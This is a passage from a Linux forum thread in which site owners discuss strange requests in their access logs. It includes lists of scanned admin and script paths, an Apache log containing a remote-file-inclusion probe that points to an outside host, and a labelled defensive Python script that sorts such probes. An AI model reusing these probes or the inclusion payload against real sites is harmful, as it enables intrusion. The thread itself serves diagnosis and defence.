Page 2 of 2
Results 11 to 18 of 18
  1. #11
    Linux Guru Rubberman's Avatar
    Join Date
    Apr 2009
    Location
    I can be found either 40 miles west of Chicago, in Chicago, or in a galaxy far, far away.
    Posts
    11,452

    If it only happens occasionally, then it is likely someone has input the wrong IP address, or host.domain name in their browser or web-enabled application.
    Sometimes, real fast is almost as good as real time.
    Just remember, Semper Gumbi - always be flexible!

  2. #12
    Linux Guru Lakshmipathi's Avatar
    Join Date
    Sep 2006
    Location
    3rd rock from sun - Often seen near moon
    Posts
    1,757

    Hi -
    My stats show only the last 25 IP addresses, so it's difficult to detect the origin of the attack.

    Here are a few other strange accesses to my site:


    cgi-sys/India
    /path/index.php
    /ocp-103/index.php
    /(null)
    //polynews//
    //modules/Forums/admin/admin_users.php
    /suskun.htm
    /phpmyadmin/index.php
    phpmyadmin/z9v8index.php
    /ccTiddly/index.php
    //init.php
    //CMD.TXT
    /backend/fm-releases-global.xml
    /cpanelf
    /cpenal
    /_vti_bin/owssvr.dll
    /MSOffice/cltreq.asp
    I don't have any PHP or ASP files; the site is just a pure HTML site.

    Does this suggest someone really tried to hack my site?
    First they ignore you,Then they laugh at you,Then they fight with you,Then you win. - M.K.Gandhi
    -----
    FOSS India Award winning ext3fs Undelete tool www.giis.co.in. Online Linux Terminal http://www.webminal.org

  3. #13
    Linux Guru Rubberman's Avatar
    Join Date
    Apr 2009
    Location
    I can be found either 40 miles west of Chicago, in Chicago, or in a galaxy far, far away.
    Posts
    11,452
    As suggested previously I4ever, this is probably the result of some sort of web crawler. Add the robots.txt entries to your system. It may not eliminate them, but it will reduce their occurrences. In any case, I don't see anything that would be too suspicious in these attempted accesses. A web site is kind of like an open house in that anyone can go there, and they can look into any room that isn't locked. Sometimes when I am on a site and I am looking for something in particular, I will either try to access the directory it is in, or I will try to access the file I am looking for directly. This is not intended to try and hack their systems, but doubtless their logs show something very similar to what you are seeing.
    Sometimes, real fast is almost as good as real time.
    Just remember, Semper Gumbi - always be flexible!

  4. #14
    Linux Engineer Freston's Avatar
    Join Date
    Mar 2007
    Location
    The Netherlands
    Posts
    1,049
    I get these all the time, whether Apache is running or not...

    ...my thought is that these are random (or rather systematic) scripted probes for known vulnerabilities. I think everyone gets them, and perhaps non-assigned (empty or off-line) IPs also get them.

    You are just one in a long list of IPs that get targeted, and I wouldn't worry too much about it.


    Here's (part of) mine, without source IPs:
    Code:
     - [03/May/2009:14:22:48 +0200] "GET /roundcube/index.php HTTP/1.1" 404 485
     - [03/May/2009:14:22:48 +0200] "GET /webmail/index.php HTTP/1.1" 404 485
     - [03/May/2009:14:22:48 +0200] "GET /index.php HTTP/1.1" 404 485
     - [03/May/2009:14:22:48 +0200] "GET /mail/index.php HTTP/1.1" 404 485
     - [08/May/2009:21:48:07 +0200] "GET /admin/phpmyadmin/main.php HTTP/1.0" 404 485
     - [08/May/2009:21:48:07 +0200] "GET /admin/phpMyAdmin/main.php HTTP/1.0" 404 485
     - [08/May/2009:21:48:07 +0200] "GET /admin/sysadmin/main.php HTTP/1.0" 404 485
     - [08/May/2009:21:48:07 +0200] "GET /admin/sqladmin/main.php HTTP/1.0" 404 485
     - [08/May/2009:21:48:08 +0200] "GET /admin/db/main.php HTTP/1.0" 404 485
     - [08/May/2009:21:48:08 +0200] "GET /admin/web/main.php HTTP/1.0" 404 485
     - [08/May/2009:21:48:08 +0200] "GET /admin/pMA/main.php HTTP/1.0" 404 485
     - [09/May/2009:08:13:06 +0200] "GET /wordtrans/index.html HTTP/1.1" 404 485
     - [09/May/2009:08:13:06 +0200] "GET /wordtrans/index.php HTTP/1.1" 404 485
     - [09/May/2009:09:44:47 +0200] "GET //README HTTP/1.1" 404 485
     - [09/May/2009:09:44:47 +0200] "GET /horde//README HTTP/1.1" 404 485
     - [09/May/2009:09:44:48 +0200] "GET /horde2//README HTTP/1.1" 404 485
     - [09/May/2009:09:44:48 +0200] "GET /horde3//README HTTP/1.1" 404 485
     - [09/May/2009:09:44:48 +0200] "GET /horde-3.0.9//README HTTP/1.1" 404 485
     - [09/May/2009:09:44:48 +0200] "GET /Horde//README HTTP/1.1" 404 485
     - [10/May/2009:02:23:04 +0200] "GET /README.txt HTTP/1.1" 404 485
     - [10/May/2009:02:23:04 +0200] "GET /moodle/README.txt HTTP/1.1" 404 485
     - [10/May/2009:10:50:03 +0200] "GET //user/templates/footer.tpl HTTP/1.1" 404 485
     - [11/May/2009:00:52:49 +0200] "GET //user/templates/footer.tpl HTTP/1.1" 404 485
     - [11/May/2009:02:46:29 +0200] "GET /appserv/main.php?appserv_root=http://217.73.17.133/pristupy/penati/usage_220801.html?& HTTP/1.1" 404 485
     - [11/May/2009:07:15:51 +0200] "GET /typo3conf/index.html HTTP/1.1" 404 485
     - [11/May/2009:07:19:16 +0200] "GET /appserv/main.php?appserv_root=http://217.73.17.133/pristupy/penati/usage_220801.html?& HTTP/1.1" 404 485
     - [11/May/2009:09:47:05 +0200] "GET //user/templates/footer.tpl HTTP/1.1" 404 485
     - [13/May/2009:19:19:42 +0200] "GET /user/soapCaller.bs HTTP/1.1" 404 485
     - [14/May/2009:15:05:22 +0200] "GET /wordtrans/index.html HTTP/1.1" 404 485
     - [14/May/2009:15:05:22 +0200] "GET /wordtrans/index.php HTTP/1.1" 404 485
     - [15/May/2009:11:11:06 +0200] "GET /wordtrans/index.html HTTP/1.1" 404 485
     - [15/May/2009:11:11:06 +0200] "GET /wordtrans/index.php HTTP/1.1" 404 485
     - [16/May/2009:18:19:03 +0200] "GET /user/soapCaller.bs HTTP/1.1" 404 485
     - [18/May/2009:10:12:30 +0200] "GET http://www.cavanmuseum.ie/images/Cursing-Stones.jpg HTTP/1.1" 404 485
     - [18/May/2009:10:27:04 +0200] "GET /user/soapCaller.bs HTTP/1.1" 404 485
    As you see, all of them are 404, and have nothing to do with whatever it is I am running.
    Can't tell an OS by it's GUI
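
Added example, not code from any poster in this thread: a small triage pass over an Apache access log that sorts the kinds of requests shown above into categories and, going one step beyond the posts, lists any probe that was answered with something other than 404. It assumes a static HTML site as described in post #12; the category names, helper names and sample lines are constructed for illustration, and the hosts are documentation addresses.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Apache common log format: host ident user [time] "METHOD target proto" status size
LINE_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
                     r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')
# Assumption: the site is static HTML, so these extensions are never legitimate.
SCRIPT_EXT = re.compile(r'\.(php|asp|aspx|dll|cgi|tpl)$', re.IGNORECASE)
URL_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)

def classify(target):
    """Return a probe category for a request target, or None if it looks ordinary."""
    if URL_RE.match(target):
        return "proxy-probe"       # absolute URI: checking for an open proxy
    path, _, query = target.partition("?")
    if any(URL_RE.match(value) for _, value in parse_qsl(query)):
        return "remote-include"    # URL handed to a parameter (remote file inclusion)
    if SCRIPT_EXT.search(path):
        return "script-probe"      # script path on a site that serves no scripts
    return None

def summarize(lines):
    """Per host: probe counts by category, plus probes answered with anything but 404."""
    report = defaultdict(lambda: {"counts": defaultdict(int), "answered": []})
    for line in lines:
        m = LINE_RE.match(line)
        kind = classify(m["target"]) if m else None
        if kind is None:
            continue
        report[m["host"]]["counts"][kind] += 1
        if m["status"] != "404":
            report[m["host"]]["answered"].append((m["target"], int(m["status"])))
    return report

# Constructed sample: paths follow the thread, hosts are documentation addresses.
SAMPLE = [
    '192.0.2.10 - - [08/May/2009:21:48:07 +0200] "GET /admin/phpmyadmin/main.php HTTP/1.0" 404 485',
    '192.0.2.10 - - [08/May/2009:21:48:08 +0200] "GET //init.php HTTP/1.1" 404 485',
    '192.0.2.10 - - [08/May/2009:21:48:08 +0200] "GET /_vti_bin/owssvr.dll HTTP/1.1" 404 485',
    '198.51.100.7 - - [11/May/2009:02:46:29 +0200] "GET /appserv/main.php?appserv_root=http://192.0.2.99/x.html?& HTTP/1.1" 404 485',
    '198.51.100.7 - - [18/May/2009:10:12:30 +0200] "GET http://example.org/a.jpg HTTP/1.1" 404 485',
    '203.0.113.5 - - [19/May/2009:09:00:00 +0200] "GET /index.html HTTP/1.1" 200 5120',
    '203.0.113.5 - - [19/May/2009:09:00:02 +0200] "GET /phpmyadmin/index.php HTTP/1.1" 200 1820',
]

if __name__ == "__main__":
    for host, info in summarize(SAMPLE).items():
        print(host, dict(info["counts"]), "answered:", info["answered"])
```

An empty `answered` list for a host means every probe from it hit a 404; any entry there is a path that exists on the server and is worth inspecting.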

  5. #15
    Linux Guru Rubberman's Avatar
    Join Date
    Apr 2009
    Location
    I can be found either 40 miles west of Chicago, in Chicago, or in a galaxy far, far away.
    Posts
    11,452
    Quote: Originally posted by Lakshmipathi
    Hi -
    My stats show only the last 25 IP addresses, so it's difficult to detect the origin of the attack.

    Here are a few other strange accesses to my site ...

    I don't have any PHP or ASP files; the site is just a pure HTML site.

    Does this suggest someone really tried to hack my site?
    It's possible. Do check your HTML for modifications that you haven't made. If someone did hack into your site, they could have added malicious code to your web pages. I.e., they might not be quite so "vanilla" any longer!
    Sometimes, real fast is almost as good as real time.
    Just remember, Semper Gumbi - always be flexible!

  6. #16
    Linux Guru Lakshmipathi's Avatar
    Join Date
    Sep 2006
    Location
    3rd rock from sun - Often seen near moon
    Posts
    1,757

    I didn't verify my HTML code; I'll check the HTML for any clues about this....

    I got a clear feeling somebody tried to play with my site; entries like this

    //modules/Forums/admin/admin_users.php
    /phpmyadmin/index.php
    clearly show someone tried to gain admin access or the backend database
    First they ignore you,Then they laugh at you,Then they fight with you,Then you win. - M.K.Gandhi
    -----
    FOSS India Award winning ext3fs Undelete tool www.giis.co.in. Online Linux Terminal http://www.webminal.org

  7. #17
    Linux Guru Rubberman's Avatar
    Join Date
    Apr 2009
    Location
    I can be found either 40 miles west of Chicago, in Chicago, or in a galaxy far, far away.
    Posts
    11,452
    First they criticize you,Then they laugh at you,Then they fight with you,Then you win. - M.K.Gandhi
    First they laugh at you, then they laugh some more, then they roll on the floor laughing, then they all die laughing. - The Three Stooges

    Sometimes, real fast is almost as good as real time.
    Just remember, Semper Gumbi - always be flexible!

  8. #18
    Linux Engineer b2bwild's Avatar
    Join Date
    Jul 2008
    Location
    Behind You!
    Posts
    1,108
    Well, that doesn't implement today's date.

    It's something more like this.

    First they criticize you,Then they laugh at you, Then they fight with you, Then you turn GodMode on X_X
    Never make any misteaks.
